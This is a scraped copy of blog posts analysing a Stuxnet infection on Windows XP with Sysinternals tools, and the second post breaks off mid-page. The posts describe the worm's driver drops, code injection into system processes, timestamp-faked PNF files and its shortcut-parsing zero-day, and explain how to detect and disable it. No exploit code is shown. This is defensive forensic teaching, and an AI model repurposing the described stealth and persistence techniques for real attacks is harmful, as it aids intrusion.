markruss@ntdev.microsoft.com </EM> </A> <EM> . </EM> </P> </BODY></HTML> Thu, 27 Jun 2019 07:18:06 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-3/ba-p/724073 MarkRussinovich 2019-06-27T07:18:06Z Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 2 https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-2/ba-p/724055 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 15, 2011 </STRONG> <BR /> <P> In <A href="#" target="_blank"> Part 1 </A> I began my investigation of an example infection of the infamous Stuxnet worm with the Sysinternals tools. I used <A href="#" target="_blank"> Process Explorer </A> , <A href="#" target="_blank"> Autoruns </A> and <A href="#" target="_blank"> VMMap </A> for a post-infection survey of the system. Autoruns quickly revealed the heart of Stuxnet, two device drivers named Mrxcls.sys and Mrxnet.sys, and it turned out that disabling those drivers and rebooting is all that’s necessary to disable Stuxnet (barring a reinfection). With Process Explorer and VMMap we saw that Stuxnet injected code into various system processes and created processes running system executables to serve as additional hosts for its payload. By the end of the post I had gotten as far as I could with a snapshot-based view of the infection, however. In this post I continue the investigation by analyzing the <A href="#" target="_blank"> Process Monitor </A> log I captured during the infection to gain deeper insight into Stuxnet’s impact on an infected system and how it operates (incidentally, if you like these blog posts, cybersecurity, and books by Tom Clancy and Michael Crichton, be sure to check out my new cyberthriller, <A href="#" target="_blank"> Zero Day </A> ). </P> <H3> Filtering to Find Relevant Events </H3> <P> Process Monitor captured around 30,000 events while monitoring the infection, which is an overwhelming number of events to individually inspect for clues. Most of the trace actually consists of background Windows activity and operations related to Explorer navigating to a new folder and are not directly related to the infection. Because by default Process Monitor excludes advanced events (paging file, internals IRP functions, System process and NTFS metadata operations), as the status bar indicates, Process Monitor is still showing over 10,000: </P> <P> <IMG alt="image" border="0" height="111" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3823.image_5F00_thumb_5F00_6B55AF88.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121313i5C2FF0007019EA62" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="244" /> </P> <P> The key to using Process Monitor effectively when you don’t know what exactly you’re looking for is to narrow the amount of data to something manageable. Filters are a powerful way to do that and Process Monitor has a filter tailor made for these kinds of scenarios: a filter that excludes all events except ones that modify files or registry keys. You can configure this filter, “Category is Write then Include,” using the Filter dialog: </P> <P> <IMG alt="SNAGHTML32d6f75" border="0" height="254" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2620.SNAGHTML32d6f75_5F00_thumb_5F00_73D6C62E.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121314i6EC74C89087DC512" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="SNAGHTML32d6f75" width="404" /> </P> <P> Events generated by the System process are typically not relevant in troubleshooting cases, but I know that Stuxnet has kernel-mode components, so to be thorough I had to include events executed in the context of the System process, which is the process in which some device drivers execute system threads. You can remove the default filters by checking the Enable Advanced Output option on the filter menu, but I didn’t want to remove the other default filters that omit pagefile and NTFS metadata operations, so I removed just the System exclusion filter (the second one in the above filter list). The event count was down to 600: </P> <P> <IMG alt="image" border="0" height="82" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3022.image_5F00_thumb_5F00_3021D3BD.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121315i047AAB232E253146" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="244" /> </P> <P> The next step was to exclude events I knew weren’t related to the infection. Recognizing irrelevant events takes experience because it requires familiarity with typical Windows activity. For example, the first few hundred events of the remaining operations consisted of Explorer referencing values under the HKCU\Software\Microsoft\Windows\ShellNoRoam\BagsMRU registry key: </P> <P> <IMG alt="image" border="0" height="132" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6562.image_5F00_thumb_5F00_3ADF2B12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121316iE27356126C3AF3A5" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> This key is where Explorer stores state for its windows, so I could exclude them. I did so by using Process Monitor’s “quick filters” feature: I right-clicked on one of the registry paths to bring up the quick filter context menu, and selected the Exclude filter: </P> <P> <IMG alt="image" border="0" height="167" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6560.image_5F00_thumb_5F00_68604AD5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121317i22BFB21A9EDECBA8" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="404" /> </P> <P> Because I want to exclude any references to the key’s subkey’s or values, I opened the newly created filter, double-clicked on it to move it to the filter editor and changed “is” to “begins with”: </P> <P> <IMG alt="image" border="0" height="104" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8508.image_5F00_thumb_5F00_2E03456D.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121318i2A6BFAE19D7ADF5B" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="444" /> </P> <P> That reduced the event count to 450, which is a more reasonable number, but I saw still more events that I could exclude. The next set of events were the System process reading and writing registry hive files. Hive files store registry data, but it’s the registry operations themselves that are interesting, not the underlying reads and writes to the hive files. Excluding those reduced the event count to 350. I continued looking through the log, adding additional filters to exclude other extraneous events. After I was done filtering out all the background operations, the Filter dialog looked like this (some of the filters I added aren’t visible in the screenshot): </P> <P> <IMG alt="image" border="0" height="339" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3884.image_5F00_thumb_5F00_5A6EC2F4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121319i6F45BF6C3917FBC7" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="354" /> </P> <P> Now there were only 133 events and a quick glance through them confirmed that they were all probably related to Stuxnet. It was time to start deciphering them. </P> <H4> Stuxnet System Modifications </H4> <P> The first event in the remaining list shows Stuxnet, operating in the context of Explorer, apparently overwriting the first 4K of one of its two initial temporary files. </P> <P> <IMG alt="image" border="0" height="94" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3652.image_5F00_thumb_5F00_6B5BB0DD.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121320i9FD93976EE7DFE33" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> To verify that the write was indeed initiated by Stuxnet and not Explorer.exe, I double-clicked on the operation to open the Event Properties dialog and switched to the Stack page. The stack frame directly above the NtWriteFile API shows “&lt;unknown&gt;” as the Module name, which is Process Monitor’s indication that the stack address doesn’t lie in any of the DLLs loaded into the process: </P> <P> <IMG alt="image" border="0" height="222" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0312.image_5F00_thumb_5F00_6AEF7DE8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121321i23830F623E3F8672" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="289" /> </P> <P> If you are looking at stacks with third-party code you may also see &lt;unknown&gt; entries when the code doesn’t use standard calling conventions, because that interferes with the algorithm used by the stack tracing API on which Process Monitor relies. However, when I looked at Explorer’s address space with VMMap, I found a data region containing the unknown stack address 0x2FA24D5 that has both write and execution permissions, a telltale sign of virus-injected code: </P> <P> <IMG alt="image" border="0" height="58" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3542.image_5F00_thumb_5F00_51877AAE.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121322i4252D22199C1FB70" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="434" /> </P> <P> The operations following those of Explorer.exe’s are those of an Lsass.exe process creating four files - ~Dfa.tmp, ~Dfb.tmp, ~Dfc.tmp and ~Dfd.tmp - in the account’s temporary directory. Many components in Windows create temporary files, so I had to verify that these were related to Stuxnet and not to standard Windows activity. A strong hint that Stuxnet was behind them is the fact that the process ID (PID) of the Lsass.exe process, 300, doesn’t match the PID of the system’s actual Lsass.exe process, which I identified in Part 1. In fact, the PID doesn’t match any of the three Lsass.exe processes that were running after the infection, confirming that it’s another rogue Lsass.exe process launched by Stuxnet. </P> <P> To see how this Lsass.exe process relates to the others, I typed Ctrl+T to open the Process Monitor process treeview dialog (it can also be opened from the Tools menu). The process tree reveals that three additional Lsass.exe processes executed during the infection, including the one with a PID of 300. Their greyed icons in the treeview indicate that they exited before the Process Monitor capture stopped: </P> <P> <IMG alt="image" border="0" height="174" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3630.image_5F00_thumb_5F00_511B47B9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121323i91E75FFB3B392C62" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="220" /> </P> <P> I now knew that this was a rogue Lsass.exe process, but I had to verify that these temporary files weren’t just created by routine Lsass.exe activity. Again, I looked at their stacks and saw the &lt;unknown&gt; module marker like I had seen in the Explorer.exe operation’s stack. </P> <P> The next batch of entries in the trace are where things really get interesting, because we see Lsass.exe drop one of the two Stuxnet drivers, MRxCls.sys, in C:\Windows\System32\Drivers and create its corresponding registry keys: </P> <P> <IMG alt="image" border="0" height="134" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8171.image_5F00_thumb_5F00_3EE9C0F1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121324iCD55086143525075" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> I double-clicked on the WriteFile operation to see its stack and observed that the call to the CopyFileEx API meant that Stuxnet copied the driver’s contents from another file: </P> <P> <IMG alt="image" border="0" height="269" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5102.image_5F00_thumb_5F00_777D2B04.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121325i22BAC75FA68EA54C" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="219" /> </P> <P> To see the file that served as the source of the copy, I temporarily disabled the write category exclusion filter by unchecking it in the filter dialog: </P> <P> <IMG alt="image" border="0" height="101" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1738.image_5F00_thumb_5F00_0251C254.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121326i0F06D1418EAE0270" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="306" /> </P> <P> That revealed references to the ~DFD.tmp file that was created earlier, so I knew that file contained a copy of the driver: </P> <P> <IMG alt="image" border="0" height="80" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3146.image_5F00_thumb_5F00_100CC855.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121327iD07091E638905CDF" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> A few operations later the System process loads Mrxcls.sys, activating the driver: </P> <P> <IMG alt="image" border="0" height="71" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6811.image_5F00_thumb_5F00_1B346AA4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121328i77DD1F16CE4B3E54" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Next, Stuxnet prepares and loads its second driver, Mrxnet.sys. The trace shows Stuxnet writing the driver first to ~DFE.tmp, copying that file to the destination Mrxnet.sys file, and defining the Mrxnet.sys registry values: </P> <P> <IMG alt="image" border="0" height="155" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6445.image_5F00_thumb_5F00_687D8C24.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121329i57EB9DABD44EDAF6" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> A few operations later the System process loads the driver like it loaded Mrxcls.sys. </P> <P> The final modifications made by the virus include the creation of four additional files in the C:\Windows\Inf directory: Oem7a.pnf, Mdmeric3.pnf, Mdmcpq3.pnf and Oem6c.pnf.&nbsp; The file creations are visible together after I set a filter that includes only CreateFile operations: </P> <P> <IMG alt="image" border="0" height="69" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0257.image_5F00_thumb_5F00_7D02DBA2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121330i5968062EF979E03A" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="355" /> </P> <P> PNF files are precompiled INF files and INF files are device driver installation information files. The C:\Windows\Inf directory stores a cache of these files and usually has a PNF file for each INF file. Unlike the other PNF files in the directory, there are no matching INF files matching the names of Stuxnet’s PNF files, but their names make them blend in with the other files in that directory. Like for the operations writing the driver files, the stacks of these operations also have references to CopyFileEx, and disabling the write-exclusion filter shows that their source files are also the temporary files Stuxnet initially created. Here you can see Stuxnet copying ~Dfa.dmp to Oem7a.pnf: </P> <P> <IMG alt="image" border="0" height="146" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1830.image_5F00_thumb_5F00_7C96A8AD.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121331i55DBC066D7261F82" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> All of the writes to these files are performed by the Lsass.exe process with the exception of a few writes to Mdmcpq3.pnf by the infected Services.exe process: </P> <P> <IMG alt="image" border="0" height="43" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3007.image_5F00_thumb_5F00_2CBE7E5B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121332iC41E9C1FB737A874" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> When done with the copies, Stuxnet takes additional steps to make the files blend in by setting their timestamp to match those of other PNF files in the directory, which on the sample system is November 4, 2009. The SetBasicInformationFile operation here sets the create time on Oem7a.pnf: </P> <P> <IMG alt="image" border="0" height="80" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1072.image_5F00_thumb_5F00_70CD6D27.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121333i4C6CC6A1EF8A3F4C" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Once Stuxnet has set the timestamps, it cleans up after itself by marking the temporary files it created for deletion when it closes them (the operations deleting the other temporary files are in other parts of the trace): </P> <P> <IMG alt="image" border="0" height="47" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8371.image_5F00_thumb_5F00_65692868.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121334i18D78761D5F072E2" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> It’s odd that Stuxnet writes temporary files and then makes copies of them, but it doesn’t appear to be a significant aspect of its execution since no Stuxnet research summary even mentions the temporary files. </P> <P> One operation in the trace that I can’t account for, and for which I’ve seen no explanation in any of the published Stuxnet analyses, is an attempt to delete a registry value named HKLM\System\CurrentControlSet\Services\Network\FailoverConfig: </P> <P> <IMG alt="image" border="0" height="71" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2110.image_5F00_thumb_5F00_6CDAE4F6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121335iC16B0895C84073B2" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> That registry value and even the Network key referenced are not used by Windows or any component I could find. A search of the executables under the C:\Windows directory didn’t yield any hits. Perhaps Stuxnet creates the value under certain circumstances as a marker and this code automatically runs to delete it. </P> <H4> Next Steps </H4> <P> So far, our analysis of the Stuxnet infection with several Sysinternals tools has documented Stuxnet’s system impact at the time of infection, method of reactivation at subsequent boots, and provided a complete recipe for disabling and cleaning Stuxnet off a compromised system. In Part 3 I’ll wrap up my look at Stuxnet with the Sysinternals tools by examining how Stuxnet uses each of the four PNF files it created in order to gain some idea as to their purpose. I’ll also analyze a trace of a Windows 7 Stuxnet infection to show the method by which Stuxnet took advantage of a zero day vulnerability on Windows 7 (which has since been patched) to gain administrative rights when it was first activated with standard user rights. Continued with <A href="#" target="_blank"> Part 3 </A> . </P> <P> <EM> Mark Russinovich is a Technical Fellow on the Windows Azure team at Microsoft and is author of <A href="#" target="_blank"> Windows Internals </A> , <A href="#" target="_blank"> The Windows Sysinternals Administrator’s Reference </A> , and the cyberthriller <A href="#" target="_blank"> Zero Day: A Novel </A> . You can contact him at </EM> <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> <EM> markruss@ntdev.microsoft.com </EM> </A> <EM> . </EM> </P> </BODY></HTML> Thu, 27 Jun 2019 07:16:34 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-2/ba-p/724055 MarkRussinovich 2019-06-27T07:16:34Z Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 1 https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-1/ba-p/724029 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 26, 2011 </STRONG> <BR /> <P> Though I didn’t realize what I was seeing, <A href="#" target="_blank"> Stuxnet </A> first came to my attention on July 5 last summer when I received an email from a programmer that included a driver file, Mrxnet.sys, that they had identified as a rootkit. A driver that implements rootkit functionality is nothing particularly noteworthy, but what made this one extraordinary is that its version information identified it as a Microsoft driver and it had a valid digital signature issued by <A href="#" target="_blank"> Realtek Semiconductor Corporation </A> , a legitimate PC component manufacturer (while I appreciate the programmer entrusting the rootkit driver to me, the official way to submit malware to Microsoft is via the <A href="#" target="_blank"> Malware Protection Center portal </A> ). </P> <P> I forwarded the file to the Microsoft antimalware and security research teams and our internal review into what became the Stuxnet saga began to unfold, quickly making the driver I had received become one of the most infamous pieces of malware ever created. Over the course of the next several months, investigations revealed that Stuxnet made use of four “zero day” Windows vulnerabilities to spread and to gain administrator rights once on a computer (all of which were fixed shortly after they were revealed) and was signed with certificates stolen from <A href="#" target="_blank"> Realtek </A> and <A href="#" target="_blank"> JMicron </A> . Most interestingly, <A href="#" target="_blank"> analysts discovered code </A> that reprograms Siemens SCADA (Supervisory Control and Data Acquisition) systems used in some centrifuges, and many suspect Stuxnet was specifically designed to destroy the centrifuges used by Iran’s nuclear program to enrich Uranium, a goal the <A href="#" target="_blank"> Iranian government reported the virus at least partially accomplished </A> . </P> <P> As a result, Stuxnet has been universally acknowledged as the most sophisticated piece of malware created. Because of its apparent motives and clues found in the code, some researchers believe that it’s the first known example of malware used for state-sponsored cyber warfare. Ironically, I present several examples of malware targeting infrastructure systems in my recently-published cyber-thriller <A href="#" target="_blank"> Zero Day </A> , which when I wrote the book several years ago seemed a bit of a stretch. Stuxnet has proven the examples to be much more likely than I had thought (by the way, if you’ve read Zero Day, please leave a review on <A href="#" target="_blank"> Amazon.com </A> ). </P> <H4> <FONT size="4" style="font-weight: bold"> Malware and the Sysinternals Tools </FONT> </H4> <P> My <A href="#" target="_blank"> last several blog posts </A> have documented cases of the <A href="#" target="_blank"> Sysinternals </A> tools being used to help clean malware infections, but malware researchers also commonly use the tools to analyze malware. Professional malware analysis is a rigorous and tedious process that requires disassembling malware to reverse engineer its operation, but systems monitoring tools like Sysinternals <A href="#" target="_blank"> Process Monitor </A> and <A href="#" target="_blank"> Process Explorer </A> can help analysts get an overall view of malware operation. They can also provide insight into malware’s purpose and help to identity points of execution and pieces of code that require deeper inspection. As the previous blog posts hint, those findings can also serve as a guide for creating malware cleaning recipes for inclusion in antimalware products. </P> <P> I therefore thought it would be interesting to show the insights the Sysinternals tools give when applied to the initial infection steps of the Stuxnet virus (note that no centrifuges were harmed in the writing of this blog post). I’ll show a full infection of a Windows XP system and then uncover the way the virus uses one of the zero-day vulnerabilities to elevate itself to administrative rights when run from an unprivileged account on Windows 7. Keep in mind that Stuxnet is an incredibly complex piece of malware. It propagates and communicates using multiple methods and performs different operations depending on the version of operating system infected and the software installed on the infected system. This look at Stuxnet just scratches the surface and is intended to show how with no special reverse engineering expertise, Sysinternals tools can reveal the system impact of a malware infection. See Symantec’s <A href="#" target="_blank"> W32.Stuxnet Dossier </A> for a great in-depth analysis of Stuxnet’s operation. </P> <H4> <FONT size="4" style="font-weight: bold"> The Stuxnet Infection Vector </FONT> </H4> <P> Stuxnet spread last summer primarily via USB keys, so I’ll start the infection with the virus installed on a key. The virus consists of six files: four malicious shortcut files with names that are based off of “Copy of Shortcut to.lnk” and two files with names that make them look like common temporary files. I’ve used just one of the shortcut files for this analysis, since they all serve the same purpose: </P> <P> <IMG alt="image" border="0" height="179" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2783.image_5F00_thumb_5F00_2BBF20E1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121301iF7ACD4EBFDCA9AE6" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="190" /> </P> <P> In this infection vector, Stuxnet begins executing without user interaction by taking advantage of a zero-day vulnerability in the Windows Explorer Shell (Shell32.dll) shortcut parsing code. All the user has to do is open a directory containing the Stuxnet files in Explorer. To let the infection succeed, I first uninstalled the fix for the Shell flaw, <A href="#" target="_blank"> KB2286198 </A> , that was pushed out by Windows Update in August 2010. When Explorer opens the shortcut file on an unpatched system to find the shortcut’s target file so that it can helpfully show the icon, Stuxnet infects the system and uses rootkit techniques to hide the files, causing them to disappear from view. </P> <P> <FONT size="4" style="font-weight: bold"> Stuxnet on Windows XP </FONT> </P> <P> Before triggering the infection, I started <A href="#" target="_blank"> Process Monitor </A> , <A href="#" target="_blank"> Process Explorer </A> and <A href="#" target="_blank"> Autoruns </A> . I configured Autoruns to perform a scan with the “Hide Microsoft and Windows Entries” and “Verify Code Signatures” options checked: </P> <P> <IMG alt="image" border="0" height="149" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1307.image_5F00_thumb_5F00_52F6A581.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121302iFFDAAFE9804682F1" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="244" /> </P> <P> This removes any entries that have Microsoft or Windows digital signatures so that Autoruns shows only entries populated by third-party code, including code signed by other publishers. I saved the output of the scan so that I could have Autoruns compare against it later and highlight any entries added by Stuxnet. Similarly, I paused the Process Explorer display by pressing the space bar, which would enable me to refresh it after the infection and cause it to show any processes started by Stuxnet in the green background color Process Explorer uses for new processes. With Process Monitor capturing registry, file system, and DLL activity, I navigated to the USB key’s root directory, watched the temporary files vanish, waited a minute to give the virus time to complete its infection, stopped Process Monitor and refreshed both Autoruns and Process Explorer. </P> <P> After refreshing Autoruns, I used the Compare function in the File menu to compare the updated entries with the previously saved scan. Autoruns detected two new device driver registrations, Mrxnet.sys and Mrxcls.sys: </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8737.image_5F00_thumb_5F00_2092D202.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121303i57F0B4A60816289B" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Mrxnet.sys is the driver that the programmer originally sent me and that implements the rootkit that hides files, and Mrxcls.sys is a second Stuxnet driver file that launches the malware when the system boots. Stuxnet’s authors could easily have extended Mrxnet’s cloak to hide these files from tools like Autoruns, but they apparently felt confident that the valid digital signatures from a well-known hardware company would cause anyone that noticed them to pass them over. It turns out that Autoruns has told us all we need to know to clean the infection, which is as easy as deleting or disabling the two driver entries. </P> <P> Turning my attention to Process Explorer, I also saw two green entries, both instances of the Local Security Authority Subsystem (Lsass.exe) process: </P> <P> <IMG alt="image" border="0" height="77" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0211.image_5F00_thumb_5F00_20269F0D.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121304i5495DB9D3E6DAAA8" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Note the instance of Lsass.exe immediately beneath them that’s highlighted in pink: a normal Windows XP installation has just one instance of Lsass.exe that the Winlogon process creates when the system boots (Wininit creates it on Windows Vista and higher). The process tree reveals that the two new Lsass.exe instances were both created by Services.exe (not visible in the screenshot), the Service Control Manager, which implies that Stuxnet somehow got its code into the Services.exe process. </P> <P> Process Explorer can also check the digital signatures on files, which you initiate by opening the process or DLL properties dialog and clicking on the Verify button, or by selecting the Verify Image Signatures option in the Options menu. Checking the rogue Lsass processes confirms that they are running the stock Lsass.exe image: </P> <P> <IMG alt="image" border="0" height="354" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2783.image_5F00_thumb_5F00_0AC8E9A5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121305i5C96A3695F406F09" style="background-image: none; 